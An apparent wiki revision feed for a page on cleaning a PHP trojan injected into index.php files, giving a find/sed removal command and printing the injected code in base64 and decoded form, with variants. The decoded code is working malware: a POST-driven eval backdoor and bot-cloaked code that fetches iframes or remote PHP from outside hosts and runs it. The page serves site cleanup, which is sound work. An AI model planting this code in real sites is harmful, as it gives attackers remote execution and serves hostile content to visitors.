<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>http://wiki.lunasys.fr/mediawiki/index.php?action=history&amp;feed=atom&amp;title=Code%2FPHP%2FTrojanRemoval</id>
	<title>Code/PHP/TrojanRemoval - Revision history</title>
	<link rel="self" type="application/atom+xml" href="http://wiki.lunasys.fr/mediawiki/index.php?action=history&amp;feed=atom&amp;title=Code%2FPHP%2FTrojanRemoval"/>
	<link rel="alternate" type="text/html" href="http://wiki.lunasys.fr/mediawiki/index.php?title=Code/PHP/TrojanRemoval&amp;action=history"/>
	<updated>2026-05-13T23:09:47Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.34.0</generator>
	<entry>
		<id>http://wiki.lunasys.fr/mediawiki/index.php?title=Code/PHP/TrojanRemoval&amp;diff=174&amp;oldid=prev</id>
		<title>Eadam: Created page with &quot;== Remove trojan in *index.php files ==  The following command:  &lt;pre&gt; find . -name '*index.php' -exec sed -i &quot;s|&lt;?php\ /\*68066\*/\ error_reporting(0);\ @ini_set('error_log',...&quot;</title>
		<link rel="alternate" type="text/html" href="http://wiki.lunasys.fr/mediawiki/index.php?title=Code/PHP/TrojanRemoval&amp;diff=174&amp;oldid=prev"/>
		<updated>2012-06-24T11:55:30Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;== Remove trojan in *index.php files ==  The following command:  &amp;lt;pre&amp;gt; find . -name &amp;#039;*index.php&amp;#039; -exec sed -i &amp;quot;s|&amp;lt;?php\ /\*68066\*/\ error_reporting(0);\ @ini_set(&amp;#039;error_log&amp;#039;,...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;== Remove trojan in *index.php files ==&lt;br /&gt;
&lt;br /&gt;
The following command:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
find . -name '*index.php' -exec sed -i &amp;quot;s|&amp;lt;?php\ /\*68066\*/\ error_reporting(0);\ @ini_set('error_log',NULL);\ @ini_set('log_errors',0);\ @ini_set('display_errors','Off');\ @eval(\ base64_decode('.*'));/\*68066\*/\ ?&amp;gt;||&amp;quot; {} \;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Remove the following badware:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaWYgKGlzc2V0KCRfUE9TVFsnY29va2llc19pJ10pKSB7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnY29va2llc19pJ10pKTt9CiR6Mzc9InN0YXRzIjsKJHVhMz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiR1MzcgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJNYWMiKTsKaWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICR1MzcpIC4gIi9pIiwgJHVhMykpIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pID09MCkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJdKSkpCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoKSsxNzI4MDApOwokaWQ9IjlvOGFhODhsOGVqaTEycmpmNWtva2VteGZ5amx6MXQiOwokdXJsPSJodHRwOi8vaWZyYW1lc2hvcC5uZXQvc3RpLnBocD9pZD0iLiRpZDsKJGlmcmFtZT1AZmlsZV9nZXRfY29udGVudHMgKCR1cmwpOwppZiAoJGlmcmFtZSkgZWNobygkaWZyYW1lKTsgCn0K'));/*68066*/ ?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
php code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
error_reporting(0);&lt;br /&gt;
set_time_limit(0);&lt;br /&gt;
if (isset($_POST['cookies_i'])) {eval(base64_decode($_POST['cookies_i']));}&lt;br /&gt;
$z37=&amp;quot;stats&amp;quot;;&lt;br /&gt;
$ua3=$_SERVER[&amp;quot;HTTP_USER_AGENT&amp;quot;];&lt;br /&gt;
$u37 = array(&amp;quot;Google&amp;quot;, &amp;quot;Slurp&amp;quot;, &amp;quot;MSNBot&amp;quot;, &amp;quot;ia_archiver&amp;quot;, &amp;quot;Yandex&amp;quot;, &amp;quot;Rambler&amp;quot;, &amp;quot;Mac&amp;quot;);&lt;br /&gt;
if((preg_match(&amp;quot;/&amp;quot; . implode(&amp;quot;|&amp;quot;, $u37) . &amp;quot;/i&amp;quot;, $ua3)) or (isset($_SERVER[&amp;quot;HTTP_USER_AGENT&amp;quot;]) ==0) or (isset($_SERVER[&amp;quot;HTTP_COOKIE&amp;quot;])))&lt;br /&gt;
{}&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
  @setcookie($z37,md5(&amp;quot;stats&amp;quot;),time()+172800);&lt;br /&gt;
  $id=&amp;quot;9o8aa88l8eji12rjf5kokemxfyjlz1t&amp;quot;;&lt;br /&gt;
  $url=&amp;quot;http://iframeshop.net/sti.php?id=&amp;quot;.$id;&lt;br /&gt;
  $iframe=@file_get_contents ($url);&lt;br /&gt;
  if ($iframe) echo($iframe); &lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
With different variants:&lt;br /&gt;
&lt;br /&gt;
* ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKJHozNz0ic3RhdHMiOwokdWEzPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJHUzNyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgIk1hYyIsICJpbnV4IiwgIlgxMSIpOwppZigocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJHUzNykgLiAiL2kiLCAkdWEzKSkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSkgPT0wKSAgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJdKSkgIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pID09MCkgKQp7fQplbHNlCnsKQHNldGNvb2tpZSgkejM3LG1kNSgic3RhdHMiKSx0aW1lKCkrMTcyODAwKTsKJHVybCA9ICJodHRwOi8vNDA0MGVudC5jb20vc2Vzc2lvbi5waHA/aWQiOwokaWZyYW1lPUBldmFsKGZpbGVfZ2V0X2NvbnRlbnRzICgkdXJsKSk7CmlmICgkaWZyYW1lKSBlY2hvKCRpZnJhbWUpOyAKfQoK&lt;br /&gt;
&lt;br /&gt;
php code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
error_reporting(0);&lt;br /&gt;
set_time_limit(0);&lt;br /&gt;
$z37=&amp;quot;stats&amp;quot;;&lt;br /&gt;
$ua3=$_SERVER[&amp;quot;HTTP_USER_AGENT&amp;quot;];&lt;br /&gt;
$u37 = array(&amp;quot;Google&amp;quot;, &amp;quot;Slurp&amp;quot;, &amp;quot;MSNBot&amp;quot;, &amp;quot;ia_archiver&amp;quot;, &amp;quot;Yandex&amp;quot;, &amp;quot;Rambler&amp;quot;, &amp;quot;Mac&amp;quot;, &amp;quot;inux&amp;quot;, &amp;quot;X11&amp;quot;);&lt;br /&gt;
if((preg_match(&amp;quot;/&amp;quot; . implode(&amp;quot;|&amp;quot;, $u37) . &amp;quot;/i&amp;quot;, $ua3)) or (isset($_SERVER[&amp;quot;HTTP_REFERER&amp;quot;]) ==0)  or (isset($_SERVER[&amp;quot;HTTP_COOKIE&amp;quot;]))  or (isset($_SERVER[&amp;quot;HTTP_USER_AGENT&amp;quot;]) ==0) )&lt;br /&gt;
{}&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
  @setcookie($z37,md5(&amp;quot;stats&amp;quot;),time()+172800);&lt;br /&gt;
  $url = &amp;quot;http://4040ent.com/session.php?id&amp;quot;;&lt;br /&gt;
  $iframe=@eval(file_get_contents ($url));&lt;br /&gt;
  if ($iframe) echo($iframe); &lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKJHozNz0ic3RhdHMiOwokdWEzPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJHUzNyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgIk1hYyIsICJpbnV4Iik7CmlmKChwcmVnX21hdGNoKCIvIiAuIGltcGxvZGUoInwiLCAkdTM3KSAuICIvaSIsICR1YTMpKSBvciAoaXNzZXQoJF9TRVJWRVJbIkhUVFBfQ09PS0lFIl0pKSAgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkgPT0wKSApCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoKSsxNzI4MDApOwokdXJsID0gImh0dHA6Ly80MDQwZW50LmNvbS9zZXNzaW9uLnBocD9pZCI7CiRpZnJhbWU9QGV2YWwoZmlsZV9nZXRfY29udGVudHMgKCR1cmwpKTsKaWYgKCRpZnJhbWUpIGVjaG8oJGlmcmFtZSk7IAp9&lt;br /&gt;
&lt;br /&gt;
php code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
error_reporting(0);&lt;br /&gt;
set_time_limit(0);&lt;br /&gt;
$z37=&amp;quot;stats&amp;quot;;&lt;br /&gt;
$ua3=$_SERVER[&amp;quot;HTTP_USER_AGENT&amp;quot;];&lt;br /&gt;
$u37 = array(&amp;quot;Google&amp;quot;, &amp;quot;Slurp&amp;quot;, &amp;quot;MSNBot&amp;quot;, &amp;quot;ia_archiver&amp;quot;, &amp;quot;Yandex&amp;quot;, &amp;quot;Rambler&amp;quot;, &amp;quot;Mac&amp;quot;, &amp;quot;inux&amp;quot;);&lt;br /&gt;
if((preg_match(&amp;quot;/&amp;quot; . implode(&amp;quot;|&amp;quot;, $u37) . &amp;quot;/i&amp;quot;, $ua3)) or (isset($_SERVER[&amp;quot;HTTP_COOKIE&amp;quot;]))  or (isset($_SERVER[&amp;quot;HTTP_USER_AGENT&amp;quot;]) ==0) )&lt;br /&gt;
{}&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
  @setcookie($z37,md5(&amp;quot;stats&amp;quot;),time()+172800);&lt;br /&gt;
  $url = &amp;quot;http://4040ent.com/session.php?id&amp;quot;;&lt;br /&gt;
  $iframe=@eval(file_get_contents ($url));&lt;br /&gt;
  if ($iframe) echo($iframe); &lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Eadam</name></author>
		
	</entry>
</feed>